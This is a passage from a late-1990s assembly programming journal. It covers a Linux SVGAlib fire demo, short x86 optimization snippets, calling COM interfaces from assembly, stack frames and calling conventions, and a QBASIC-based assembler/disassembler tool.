written in assembler, for example:-
WndProc:
PUSH EBP
MOV EBP,ESP
;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
7. A standardized procedure for dealing with messages to a dialog procedure
can also be created in the same way, except that it should return TRUE
(eax=1) if the message is processed and FALSE (eax=0) if it is not, without
calling DefWindowProc. The same coding method can be applied to hooks and
to enumerator CALLBACKS although these will vary.
jorgon@...http://ourworld.compuserve.com/homepages/jorgon
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Fire Demo ported to Linux SVGAlib
by Jan Wagemakers
In APJ4 there was a little nice fire demo written in DOS assembly language.
I have ported this program to Linux assembly language. It is written in the
AT&T-syntax (GNU assembler) and makes use of SVGAlib.
My main goal of porting this program to Linux was to show that it can be
done. So, I have not optimized this program. For example, things like 'call
ioperm' can also be done by making use of int 0x80; quite possibly making use
of int 0x80 will make the program smaller. More information about int 0x80 is
available at Konstantin Boldyshev's webpage [http://lightning.voshod.com/asm].
With SVGALib you can access the screen memory directly, just like you
would write to A000:0000 in a DOS asm-program.
I like to thank 'paranoya' for his explanation about how to make use of
SVGAlib. Anyway, enough blablabla, here is the source ;-)
# fire.s : fire.asm of apj 4 ported to Linux/SVGAlib ==========================
# gcc -o fire fire.s -lvga
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
call vga_init # Init vga
pushl $5
call vga_setmode # set mode to 5 = 320x200x256
addl $4,%esp
pushl $0
call vga_setpage # Point to page 0 (There is only 1 page)
addl $4,%esp
pushl $0x3c8 # Get IOpermission, starting from 3c8h
pushl $2 # to 3c9h
pushl $1 # Turn On value
call ioperm
addl $12,%esp
pushl $0x60 # Get IOpermission, for 60h : keyboard
pushl $1
Pushl $1
call ioperm
addl $12,%esp
inb $0x60,%al # Read current value of keyboard
movb %al,key
movw $0x3c8,%dx
movw $0,%ax
outb %al,%dx
incw %dx
lus:
outb %al,%dx
outb %al,%dx
outb %al,%dx
incw %ax
jnz lus
movl graph_mem,%ebx
Mainloop:
movl $1280,%esi # mov si,1280 ;
movl $0x5d00,%ecx # mov ch,5dh ; y-pos, the less the faster demo
pushl %esi # push si
pushl %ecx # push cx
Sloop:
movb (%ebx,%esi),%al # lodsb
incl %esi #
addb (%ebx,%esi),%al # al,[si] ; pick color and
addb 320(%ebx,%esi),%al # add al,[si+320] ; pick one more and
shrb $2,%al # shr al,2
movb %al,-960(%ebx,%esi) # mov [si-960],al ; put color
loop Sloop
popl %edi # pop di
popl %ecx # pop cx
Randoml:
mulw 1(%ebx,%edi) # mul word ptr [di+1] ; 'random' routine.
incw %ax
movw %ax,(%ebx,%edi) #stosw
incl %edi
incl %edi
loop Randoml
inb $0x60,%al
cmpb key,%al
jz Mainloop
pushl $0
call exit
addl $4,%esp
movl %ebp,%esp
popl %ebp
ret
.data
key:
.byte 0
# =============================================================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
Abs
by Chris Dragan
;Summary: Calculates absolute value of a signed integer in eax.
;Compatibility: 386+
;Notes: 9 bytes, 4 clocks (P5), destroys ecx
mov ecx, eax ; Duplicate value
shr ecx, 31 ; Fill ecx with its sign
xor eax, ecx ; Do 'not eax' if negative
sub eax, ecx ; Do 'inc eax' if negative
; For comparison, the standard way (2-8 clocks on P5 and 1-17 on P6):
; or eax, eax
; js @@1
; neg eax
;@@1:
Min
by Chris Dragan
;Summary: eax = min (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes: 8 bytes, 4 clocks (P5), destroys ecx and edx
sub ecx, eax ; ecx = n2 - n1
sbb edx, edx ; edx = (n1 > n2) ? -1 : 0
and ecx, edx ; ecx = (n1 > n2) ? (n2 - n1) : 0
add eax, ecx ; eax += (n1 > n2) ? (n2 - n1) : 0
; Standard cmp/jbe/mov takes 2-8 clocks on P5 and 1-17 on P6
Max
by Chris Dragan
;Summary: eax = max (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes: 9 bytes, 5 clocks (P5), destroys ecx and edx
sub ecx, eax ; ecx = n2 - n1
cmc ; cf = n1 <= n2
sbb edx, edx ; edx = (n1 > n2) ? 0 : -1
and ecx, edx ; ecx = (n1 > n2) ? 0 : (n2 - n1)
add eax, ecx ; eax += (n1 > n2) ? 0 : (n2 - n1)
; Standard cmp/jae/mov takes 2-8 clocks on P5 and 1-17 on P6
OBJECT
by mammon_
;Summary: Primitive for defining dynamic objects
;Compatibility: NASM
;Notes: The basic building block for classes in NASM; part of
; an ongoing project of mine. Note that .this can be
; filled with the instance pointer, and additional
; routines such as .%1 [constructor] and .~ can be added.
%macro OBJECT 1
struc %1
.this: resd 1
%endmacro
%macro END_OBJECT 0
endstruc
%endmacro
;_Sample:________________________________________________________________
;OBJECT MSGBOX
; .hWnd: resd 1
; .lpText: resd 1
; .lpCapt: resd 1
; .uInt: resd 1
; .show: resd 1
;END_OBJECT
;;MyMBox is a pointer to a location in memory or in an istruc; its members
;;are filled in an init routine ['new'] with "show" being "DD _show"
;_show: ;MSGBOX class display routine
; push dword [MyMbox + MSGBOX.uInt]
; push dword [MyMbox + MSGBOX.lpCapt]
; push dword [MyMbox + MSGBOX.lpText]
; push dword [MyMbox + MSGBOX.hWnd]
; call MessageBoxA
; ret
;..start:
; call [MyMbox + MSGBOX.show]
; ret
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
Binary-to-ASCII
by Jan Verhoeven
The Challenge
-------------
Write a routine to convert the value of a bit to ASCII in under 10 bytes, with
no conditional jumps.
The Solution
------------
Load the number into the AX register and shift through the bits. If a bit is
cleared [0], you want to print a "0" character; if a bit is set [1], you want
to print a "1".
Prime the BL register with the ASCII character "0"; if the next bit in AX is
set, carry will be set after the SHL and BL will thus be incremented to an
ASCII "1". The key, as you will see, is the ADC [AddWithCarry] instruction:
L0: B330 MOV BL,30 ; try with al = ZERO
D1E0 SHL AX,1 ; ... but if bit = set, ...
80D300 ADC BL,00 ; ... make it a ONE,
7 bytes all told; with a loop and mov instruction for storing each value in
BL to the location of your choice, you will have a full-fledged binary-to-
ascii converter in a handful of bytes.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Apr-June 99
:::\_____\::::::::::. Issue 4
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.comasmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Using COM in Assembly Language"..........................Lord.Lucifer
"Stack Frames and High-Level Calls"............................mammon_
"Define Your Memory".......................................Alan Baylis
"Writing a Boot Sector in A86"...........................Jan Verhoeven
"A Basic Virus Writing Primer"...................................Chili
Column: Win32 Assembly Programming
"Mouse Input....".........................................Iczelion
"Menus"...................................................Iczelion
Column: The C standard library in Assembly
"C string functions:_strtok"................................Xbios2
Column: The Unix World
"Using Menus in Xt"........................................mammon_
Column: Assembly Language Snippets
"Triple XOR".........................................Jan Verhoeven
"Trailing Calls".....................................Jan Verhoeven
Column: Issue Solution
"Fire Demo"....................................................iCE
----------------------------------------------------------------------
+++++++++++++++++++++Issue Challenge+++++++++++++++++++
Write a "Fire Demo"-style program in less than 100 bytes
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
In the last few months I have come across a number of links to APJ, and have
received the proverbial ton of email regarding it. Strangely enough, the
majority of these tend to agree that the one problem with the journal is its
infrequent --if not irregular-- publication. If that is the only complaint so
far, I think I can cope with it ;)
This issue is, naturally, very late due to what could be called "real world"
[lit., "that which does not go away when a power outtage kills your PC"]
considerations; however the articles by weight alone should make up for some
of this.
The largest of the bunch is undoubtedly the virus writing tutorial by Chili,
who may have beat my previous record for article length: a very thorough work,
worth reading just to help protect against virii, if not to write them. This
is accompanied by Jan's discussion of boot sector programming...a suitable
companion article, I believe.
High-level coders will undoubtedly be interested in Lord Lucifer's article on
COM programming in assembly; it seems that high-level areas such as COM,
DirectDraw, and Winsock coding are starting to receive a fair degree of
attention from the assembly language world, judging from the tutorials I have
been coming across.
Xbios2 has continued his excellent C stdlib work, and Icezlion has contributed
two more of his now-legendary Win32 asm tutorials; I of course have kept up
the Unix vanguard with yet another Xt article.
This month's challenge was contributed by iCE, and had a .text-size I could
not readily beat.
A few brief notes concerning the web page: I have thrown together a basic
collection of assembly language links at
http://asmjournal.freeservers.com/lynx.html
Submissions for this links page are welcome. I have also been getting a few
emails to the APJ inbox asking or offering help with assembly language; since
I check the inbox fortnightly at best, I have added a "classified ads" page to
the APJ website at
http://www.guestbook4free.com/en/28806/entries/
which is essentially a guestbook where people can post contact info, projects
they need help with, etc ... more or less a one-way bulletin board like, well,
like classified ads are.
That should just about wrap things up. Enjoy the issue!
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Using COM in Assembly Language
by Lord Lucifer
This article will discuss how to use COM interfaces in your assembly language
programs. It will not discuss what COM is and how it is used, but rather how
it can be used when programming in assembler. It will discuss only how to
use existing interfaces, and not how to actually implement new ones; this will
be shown in a future atricle.
About COM
------------------------------------------------------------------------------
Here is a brief introduction to the basics behind COM.
A COM object is one in which access to an object's data is achieved
exclusively through one or more sets of related functions. These function
sets are called interfaces, and the functions of an interface are called
methods. COM requires that the only way to gain access to the methods of an
interface is through a pointer to the interface.
An interface is actually a contract that consists of a group of related
function prototypes whose usage is defined but whose implementation
is not. An interface definition specifies the interface's member functions,
called methods, their return types, the number and types of their parameters,
and what they must do. There is no implementation associated with an
interface. An interface implementation is the code a programmer supplies to
carry out the actions specified in an interface definition.
An instance of an interface implementation is actually a pointer to an array
of pointers to methods (a function table that refers to an implementation of
all of the methods specified in the interface). Any code that has a pointer
through which it can access the array can call the methods in that interface.
Using a COM object assembly language
-------------------------------------------------------------------------------
Access to a COM object occurs through a pointer. This pointer points to a
table of function pointers in memory, called a virtual function table, or
vtable in short. This vtable contains the addresses of each of the objects
methods. To call a method, you indirectly call it through this pointer table.
Here is an example of a C++ interface, and how its methods are called:
interface IInterface
{
HRESULT QueryInterface( REFIID iid, void ** ppvObject );
ULONG AddRef();
ULONG Release();
Function1( INT param1, INT param2);
Function2( INT param1 );
}
// calling the Function1 method
pObject->Function1( 0, 0);
Now here is how the same functionality can be implemented using assembly
language:
; defining the interface
; each of these values are offsets in the vtable
QueryInterface equ 0h
AddRef equ 4h
Release equ 8h
Function1 equ 0Ch
Function2 equ 10h
; calling the Function1 method in asm
; the method is called by obtaining the address of the objects
; vtable and then calling the function addressed by the proper
; offset in the table
push param2
push param1
mov eax, pObject
push eax
mov eax, [eax]
call [eax + Function1]
You can see this is somewhat different than calling a function normally.
Here, pObject points to the Interface's vTable. At the Function1(0Ch) offset
in this table is a pointer to the actual function we wish to call.
Using HRESULT's
-------------------------------------------------------------------------------
The return value of OLE APIs and methods is an HRESULT. This is not a handle
to anything, but is merely a 32-bit value with several fields encoded in the
value. The parts of an HRESULT are shown below.
HRESULTs are 32 bit values layed out as follows:
3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1
1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
+-+-+-+-+-+---------------------+-------------------------------+
|S|R|C|N|r| Facility | Code |
+-+-+-+-+-+---------------------+-------------------------------+
S - Severity Bit
Used to indicate success or failure
0 - Success
1 - Fail
By noting that this bit is actually the sign bit of the 32-bit value,
checking success/failure is simply performed by checking its sign:
call ComFunction ; call the function
test eax,eax ; now check its return value
js error ; jump if signed (meaning error returned)
; success, so continue
R - reserved portion of the facility code, corresponds to NT's
second severity bit.
C - reserved portion of the facility code, corresponds to NT's
C field.
N - reserved portion of the facility code. Used to indicate a
mapped NT status value.
r - reserved portion of the facility code. Reserved for internal
use. Used to indicate HRESULT values that are not status
values, but are instead message ids for display strings.
Facility - is the facility code
FACILITY_WINDOWS = 8
FACILITY_STORAGE = 3
FACILITY_RPC = 1
FACILITY_WIN32 = 7
FACILITY_CONTROL = 10
FACILITY_NULL = 0
FACILITY_ITF = 4
FACILITY_DISPATCH = 2
To retreive the Facility,
call ComFunction ; call the function
shr eax, 16 ; shift the HRESULT to the right by 16 bits
and eax, 1FFFh ; mask the bits, so only the facility remains
; eax now contains the HRESULT's Facility code
Code - is the facility's status code
To get the Facility's status code,
call ComFunction ; call the function
and eax, 0000FFFFh ; mask out the upper 16 bits
; eax now contains the HRESULT's Facility's status code
Using COM with MASM
------------------------------------------------------------------------------
If you use MASM to assemble your programs, you can use some of its
capabilities to make calling COM functions very easy. Using invoke, you can
make COM calls look almost as clean as regular calls, plus you can add type
checking to each function.
Defining the interface:
IInterface_Function1Proto typedef proto :DWORD
IInterface_Function2Proto typedef proto :DWORD, :DWORD
IInterface_Function1 typedef ptr IInterface_Function1Proto
IInterface_Function2 typedef ptr IInterface_Function2Proto
IInterface struct DWORD
QueryInterface IUnknown_QueryInterface ?
AddRef IUnknown_AddRef ?
Release IUnknown_Release ?
Function1 IInterface_Function1 ?
Function2 Interface_Function2 ?
IInterface ends
Using the interface to call COM functions:
mov eax, pObject
mov eax, [eax]
invoke (IInterface [eax]).Function1, 0, 0
As you can see, the syntax may seem a bit strange, but it allows for a simple
method using the function name itself instead of offsets, as well as type
checking.
A Sample program written using COM
------------------------------------------------------------------------------
Here is some sample source code which uses COM written in straight assembly
language, so it should be compatable with any assembler you prefer with only
minor changes necessary.
This program uses the Windows Shell Interfaces to show the contents of the
Desktop folder in a window. The program is not complete, but shows how the
COM library is initialized, de-initialized, and used. I also shows how the
shell library is used to get folders and obcets, and how to perform
actions on them.
..386
..model flat, stdcall
include windows.inc ; include the standard windows header
include shlobj.inc ; this include file contains the shell namespace
; definitions and constants
;----------------------------------------------------------
..data
wMsg MSG <?>
g_hInstance dd ?
g_pShellMalloc dd ?
pshf dd ? ; shell folder object
peidl dd ? ; enum id list object
lvi LV_ITEM <?>
iCount dd ?
strret STRRET <?>
shfi SHFILEINFO <?>
...
;----------------------------------------------------------
..code
; Entry Point
start:
push 0h
call GetModuleHandle
mov g_hInstance,eax
call InitCommonControls
; initialize the Component Object Model(COM) library
; this function must be called before any COM functions are called
push 0
call CoInitialize
test eax,eax ; error when the MSB = 1
; (MSB = the sign bit)
js exit ; js = jump if signed
; Get the Shells IMalloc object pointer, and save it to a global variable
push offset g_pShellMalloc
call SHGetMalloc
cmp eax, E_FAIL
jz shutdown
; here we would set up the windows, list view, message loop, and so on....
; we would also call the FillListView procedure...
; ....
; Cleanup
; Release IMalloc Object pointer
mov eax, g_pShellMalloc
push eax
mov eax, [eax]
call [eax + Release] ; g_pShellMalloc->Release();
shutdown:
; close the COM library
call CoUninitialize
exit:
push wMsg.wParam
call ExitProcess
; Program Terminates Here
;----------------------------------------------------------
FillListView proc
; get the desktop shell folder, saved to pshf
push offset pshf
call SHGetDesktopFolder
; get the objects of the desktop folder using the EnumObjects method of
; the desktop's shell folder object
push offset peidl
push SHCONTF_NONFOLDERS
push 0
mov eax, pshf
push eax
mov eax, [eax]
call [eax + EnumObjects]
; now loop through the enum id list
idlist_loop:
; Get next id list item
push 0
push offset pidl
push 1
mov eax, peidl
push eax
mov eax, [eax]
call [eax + Next]
test eax,eax
jnz idlist_endloop
mov lvi.imask, LVIF_TEXT or LVIF_IMAGE
mov lvi.iItem,
; Get the item's name by using the GetDisplayNameOf method
push offset strret
push SHGDN_NORMAL
push offset pidl
mov eax, pshf
push eax
mov eax, [eax]
call [eax + GetDisplayNameOf]
; GetDisplayNameOf returns the name in 1 of 3 forms, so get the correct
; form and act accordingly
cmp strret.uType, STRRET_CSTR
je strret_cstr
cmp strret.uType, STRRET_OFFSET
je strret_offset
strret_olestr:
; here you could use WideCharToMultiByte to get the string,
; I have left it out because I am lazy
jmp strret_end
strret_cstr:
lea eax, strret.cStr
jmp strret_end
strret_offset:
mov eax, pidl
add eax, strret.uOffset
strret_end:
mov lvi.pszText, eax
; Get the items icon
push SHGFI_PIDL or SHGFI_SYSICONINDEX or SHGFI_SMALLICON or SHGFI_ICON
push sizeof SHFILEINFO
push offset shfi
push 0
push pidl
call SHGetFileInfo
mov eax, shfi.iIcon
mov lvi.iImage, eax
; now add item to the list
push offset lvi
push 0
push LVM_INSERTITEM
push hWndListView
call SendMessage
; repeat the loop
idlist_endloop:
; now free the enum id list
; Remember all allocated objects must be released...
mov eax, peidl
push eax
mov eax,[eax]
call [eax + Release]
; free the desktop shell folder object
mov eax, pshf
push eax
mov eax,[eax]
call [eax + Release]
ret
FillListView endp
END start
Conclusion
-------------------------------------------------------------------------------
Well, that is about it for using COM with assembly language. Hopefully, my
next article will go into how to define your own interfaces. As you can
see, using COM is not difficult at all, and with it you can add a very
powerful capability to your assembly language programs.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Stack Frames and High-Level Calls
by mammon_
Last month I covered how to implement high-level calls in Nasm. Since then it
has come to my attention that many beginning programmers are unfamiliar with
calling conventions and the stack frame; to remedy this I have prepared a brief
discussion of these topics.
The CALL Instruction
--------------------
At its most basic, an assembly language call takes this for:
push [parameters]
call [address]
Some assemblers will require that the CALL statement take as an rgument only
addresses leading to external functions or addresses created with a macro or
directive such as PROC. However, as a quick glance through a debugger or a
passing familiarity with Nasm will demonstrate, the CALL instruction simply
jumps to an address [often a label in the source code] while pushing the
contents of EIP [containing the address of the instruction following the call]
onto the stack. The CALL instruction is therefore equivalent to the following
code:
push EIP
jmp [address]
The address that has been called will thefore have the stack set up as follows:
[Last Parameter Pushed]: DWORD
[Address of Caller] : DWORD
--- "Top" of Stack [esp] ---
At this point, anything pushed onto the stack will be on top of [that is, with a
lower memory address, since the stack "grows" downwards] the return address.
The Stack Frame
---------------
Note that the parameters to the call therefore cannot be POPed from the stack,
as this will destroy the saved return address and thus cause the application to
crash upon returning from the call [unless, of course, a chosen return address
is PUSHed onto the stack before returning from the call]. The logical way to
reference these parameters, then, would be as offsets from the stack pointer:
[parameter 2] : DWORD esp + 8
[parameter 1] : DWORD esp + 4
[Address of Caller]: DWORD esp
----- "Top" of Stack [esp] -----
In this example, "parameter 1" is the parameter pushed onto the stack last, and
"parameter 2" is the parameter pushed onto the stack before parameter 1, as
follows:
push [parameter 2]
push [parameter 1]
call [procedure]
The problem with referring to parameter as offsets from esp is that esp will
change whenever a value is PUSHed onto the stack during the routine. For this
reason, it is standard for routines which take parameters to set up a "stack
frame".
In a stack frame, the base pointer [ebp] is set equal to the stack pointer [esp]
at the start of the call; this provides a "base" address from which parameters
can be addressed as offsets. It is assumed that the caller had a stack frame
also; thus the value of ebp must be preserved in order to prevent causing damage
to the caller. The stack frame usually takes the following form:
push ebp
mov ebp, esp
... [actual code for the routine] ...
mov esp, ebp
pop ebp
This means that once the stack frame has been entered, the stack has the
following structure:
[parameter 2] : DWORD ebp + 12
[parameter 1] : DWORD ebp + 8
[Address of Caller]: DWORD ebp + 4
[Old Base Pointer] : DWORD ebp
----- Base Pointer [ebp] -----
----- "Top" of Stack [esp] -----
The use of the base pointer also allows space to be allocated on the stack for
local variables. This is done by simply subtracting bytes from esp; since esp is
restored when the stack frame is exitted, this space will automatically be
deallocated. The local variables are then referred to as *negative* offsets from
ebp; these may be EQUed to meaningful symbol names in the source code. A routine
that has 3 local DWORD variables would take the following form:
Var1 EQU [ebp-4]
Var2 EQU [ebp-8]
Var3 EQU [ebp-12] ;provide meaningful names for the variables
push ebp
mov ebp, esp
sub esp, 3*4 ;3 DWORDs at 4 BYTEs apiece
... [actual code for the routine] ...
mov esp, ebp
pop ebp
This routine would then have the following stack structure after the allocation
of the local variables:
[parameter 2] : DWORD ebp + 12
[parameter 1] : DWORD ebp + 8
[Address of Caller]: DWORD ebp + 4
[Old Base Pointer] : DWORD ebp
----- Base Pointer [ebp] -----
[Var1] : DWORD ebp - 4
[Var2] : DWORD ebp - 8
[Var3] : DWORD ebp - 12
----- "Top" of Stack [esp] -----
The stack frame has can also be used to provide a call trace, as it stores the
base pointer of [and thus a pointer to the caller of] the caller. Assume that a
program has the following flow of execution:
proc_1: push dword call1_p2
push dword call1_p1
call proc_2
________proc_2: push call2_p1
call proc_3
________________proc_3: push call3_p1
call proc_4
Upon creation of the stack frame in proc_4, the stack has the following
structure:
[call1_p2] : DWORD ebp + 36
[call1_p1] : DWORD ebp + 32
[Return Addr of Call1] : DWORD ebp + 28
[Old Base Pointer] : DWORD ebp + 24
---- Base Pointer of Call 1 ----
[call2_p1] : DWORD ebp + 20
[Return Addr of Call2] : DWORD ebp + 16
[Base Pointer of Call1]: DWORD ebp + 12
---- Base Pointer of Call 2 ----
[call3_p1] : DWORD ebp + 8
[Return Addr of Call3] : DWORD ebp + 4
[Base Pointer of Call2]: DWORD ebp
----- Base Pointer [ebp] -----
----- "Top" of Stack [esp] -----
As you can see, for each previous call the return address is [ebp+4], where ebp
is the address of the saved base pointer for the call previous to that one.
Thus, if one could traverse the history of stack frames as follows:
mov eax, ebp ; eax = address of previous ebp
mov ecx, 10 ; trace the last 10 calls
loop_start:
mov ebx, [eax+4] ; ebx = return address for call
call print_stack_trace
mov eax, [eax] ; step back one stack frame
loop loop_start
This is exceptionally useful for exception handling; the handling function will
be able to print out a stack history to aid debugging. This principle can also
be applied in conjunction with debugging code [for example, the Win32 debug API]
to create a utility which will trace the calls [in reality, the stack frames of
the calls] made by a target. Essentially, this would boil down to the following
logic:
1) Breakpoint on changes to EBP
2) On Break, get return address [ebp+4]
3) Get instruction prior to return address
4) Print or log the instruction
Note that this can be enhanced to resolves symbol names in the logged CALL
instruction, such that local or API address labels [e.g. GetWindowTextA] can be
logged rather than just the address itself.
The ENTER Instruction
---------------------
The ENTER instruction is used to create a stack frame with a single instruction;
it is equivalent to the code
push ebp
mov ebp, esp
The ENTER instruction takes a first parameter that specifes the number of bytes
to reserve for local variables; an optional second parameter gives the nesting
level [0-31] of the current stack frame in the overall program structure. This
is often used by high-level languages to save call trace information for error
handlers, as it specifies the number of additional [previous] stack frame
pointers
to save on the stack.
The RET Instruction
-------------------
Any routine which is accessed by a CALL instruction must be terminated with a
return [RET] instruction. As one can see from the operation of the CALL
instruction, if you were to attempt to circumvent the RET instruction by JMPing
to the retrun address, the stack would still be corrupted. The RET statement is
roughly equivalent to the following code:
pop EIP
Note that the RET must take place after exiting the stack frame in order to
avoid corruption of the stack.
The LEAVE Instruction
---------------------
The LEAVE instruction is used to exit a stack frame created with the ENTER
instruction; it is equivalent to the code
mov esp, ebp
pop ebp
The LEAVE instruction takes no parameters and still requires a RET statement to
follow it.
High-level Language Calling Conventions
---------------------------------------
At this point one may wonder what has happened to the parameters pushed onto the
stack prior to the call. Are they still on the stack after the RET, or have they
been cleared? Since the parameters cannot be POPed from the stack while within
the call, they still are on the stack at the RET instruction.
At this point the programmer has two options. They can have the caller clean up
the stack by adding the number of bytes pushed to esp immediately after the
call:
push dword param2
push dword param1
call procedure
add esp, 2 * 4 ;2 DWORDs at 4 BYTEs apiece
Or they can clear the stack by passing to the RET instruction the number of
bytes that need to be cleared:
push dword param2
push dword param1
call procedure
...
procedure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret 8 ;2 DWORDs at 4 BYTEs apiece
Which method is chosen is left up to the programmer; however, when writing a
library or API, one must make clear who is responsible for cleaning up the
stack. In addition, when interfacing with high-leve languages, one also has to
make clear which order the parameters are to be pushed in. For this reason there
are calling conventions for the high-level languages.
The C calling convention is used to interface with the C and C++ programming
languages; it is used in the standard C library and in Unix APIs. It pushes the
parameters from right to left, and does not clean up the stack upon return from
the call. A call to a C-style routine would look as follows:
;corresponds to the C code
;procedure(param1, param2)
push dword param2
push dword param1
call procedure
add esp, 8
A C-style routine would have the following structure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret
The Pascal calling convention is used interface with the Pascal, BASIC, and
Fortran programming languages; it is used in the Win16 API. It pushes the
parameters
from left to right, and cleans up the stack upon return from the call; as such
it is the opposite of the C convention. A call to a Pascal routine would look as
follows:
;corresponds to the C code
;procedure(param1, param2)
push dword param1
push dword param2
call procedure
A Pascal-style routine would have the following structure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret 8 ;clear the 2 dword parameters
The Stdcall ["standard call" or __stdcall] calling convention is a combination
of the C and Pascal conventions; it is used in the Win32 API. It pushes the
parameters from right to left, and cleans the stack upon return from the call. A
call to a Stdcall routine would look as follows:
;corresponds to the C code
;procedure(param1, param2)
push dword param2
push dword param1
call procedure
A Stdcall-style routine would have the following structure:
push ebp
mov ebp, esp
...
mov esp, ebp
pop ebp
ret 8
There is also a Register calling convention [also called "fastcall"] which uses
registers rather than the stack to pass parameters. The first parameter is
passed in eax, the second in EDX, and the third in EBX; subsequent parameters
are passed via the stack. A call to a Register routine would look as follows:
;corresponds to the C code
;procedure(param1, param2, param3)
mov eax, param1
mov edx, param2
mov ebx, param3
call procedure
Note that there is no defined standard method of clearing the stack ro the
Register convention; however most implemntations clear the stack in the Pascal
style.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Define Your Memory
by Alan Baylis
[I am going to preface this article with a brief note, since it is not
covering assembly language per se, but rather a utility that will be of use
to asm coders. The author sums it up well in his original email to me:
"Define is a new type of assembler/disassembler that does not use source
code. The program reads the byte values in memory and checks a library to
find a definition that describes the byte values it reads. The library can
be added to and is used as a permanent macro list to write instuctions,
functions, etc to memory. Most assemblers also use standard 3 character
mnemonics to descibe the instruction set, however, with Define you can
rename the instructions and your own macros to anything and up to 250
characters."
Sounds pretty promising.
_m ]
For the x86 series of processor I have been working on a new type of assembler
and have
written a program called Define. The program could be called a sketch of what a
future
version might be like. The program is fully workable but suffers from a few
limitations,
the first is that it is written in QBASIC which may be a blow to devoted machine
coders,
and the second is that it can only comfortably use about three hundred
definitions
(Definitions are like a library of machine code macros and I'll discuss them
more fully
later) and a third limitation, not to its functionality, is that the program
doesn't have
a quick mouse and menu driven interface, but I'm working on it.
I liked the idea of macros and saw the neccessity for using them so that I and
others
don't have to "reinvent the wheel" as it has been put, but I wanted a way to see
the
machine code instructions and the byte values that made up the macro. This can't
be done
through using source code as the finished code is generated at the discretion of
the
compilers authors and requires a debugger to verify its content.
To make what was originally intended to be a debugger but without the source
code I
decided to make a program that could read memory and interpret the byte values
it finds
into their mnemonic equivalents or better (much like a debugger), so that while
reading
memory, if the program found the byte value 205 followed by the value 5 it would
display
"INT 5". To do this I needed what I termed a 'definiton' which included the byte
values
that make up an instruction or small macro and included a description or name
for the
function they perform.
Unlike what I had done with a previous assembler I decided to put the
definitions in a
separate file rather than include them as data within the main program, this
allowed
for the addition or removal of future definitions. I then quickly realised that
since
these definitions contained the byte values of an instruction, then they could
also be
used to write the bytes into memory. I added functions to save and load
programs as
well as functions to manipulate the definition file and the program was
underway.
I found while writing the definitions for the instruction set that it would be
good
(and necessary) if the program could read an instruction even if one of the
bytes is
unknown or variable; I decided to call these bytes undefined bytes, so that if
the
program found the number 205 it would display something like "Interrupt call"
regard-
less of what number followed.
While reading memory I also wanted a way to exclude data areas from being
interpreted
into definitions, so I added a new definition type called addresses which
contain the
address of the first and last bytes of a data area and a name to describe the
data area.
If these are turned on in the program then they are used instead of the normal
definitions
when reading that part of memory.
To then take Define closer to being an assembler rather than a debugger I also
included
labels that label memory addresses and the destination of jump and branch
instructions.
I envision that a future version of Define written in machine code or a similar
program
will have a pop up list of definitons and use a point and click method of
writing the
code as opposed to the current method of scrolling through them from a different
page.
The future version will also need to be able to handle thousands of definitions
as
opposed to the few hundred it can use at a time now, in order to accommodate
situations
such as the following:
To call the interrupt 21h,9 which prints a string it is necessary to put the
function
number 9 in AH and the address of the string in the registers DS:DX and then
call the
interrupt,
MOV AH,9
MOV DX,address
INT 21h
however it is also valid to put the number 9 in AH after the address of the
string has
been put in DS:DX,
MOV DX,address
MOV AH,9
INT 21h
To make a definition for this interrupt at least two definitions will need to be
made
and therefore a larger definition file. This also doesn't account for the
situation in
which the number 9 may have been filled three instructions earlier and is
assumed to be
correct at the time when the interrupt is called, in this case only the
definitions for
the instructions will be seen and not a definition for the interrupt.
One of the best aspects to Define in my book is that the memory can be viewed
according
to a persons level of understanding (or will be as the definitions are written,)
for
example the program is able to only show definitions of a certain level and no
other. I
have chosen to represent the level of a definition by its color, I have used
blue (1)
for the lowest level which are the instruction set definitions and then green
(2) for
the next level which are the DOS, BIOS, etc definitions and then magenta (3) for
the
next level which may be definitions to clear the screen and print the date
combined and
so on, so that a person who knows little about machine code may set the maximum
definition
color to red (4) and still be able to write a program using Define. The
advantage for
those who know machine code is that they need not be restricted to only a high
level
definition, by turning the observance of the color off they can press the letter
B when
viewing a high level definition and see the lower level definitions that make
up the
higher one. By repeatedly pressing B they can view the program as level 1 (blue)
or even
as the byte values themselves.
The most radical departure from most assemblers is that when writing a program
the program
is composed in memory, the byte values of the definitions are written directly
to an
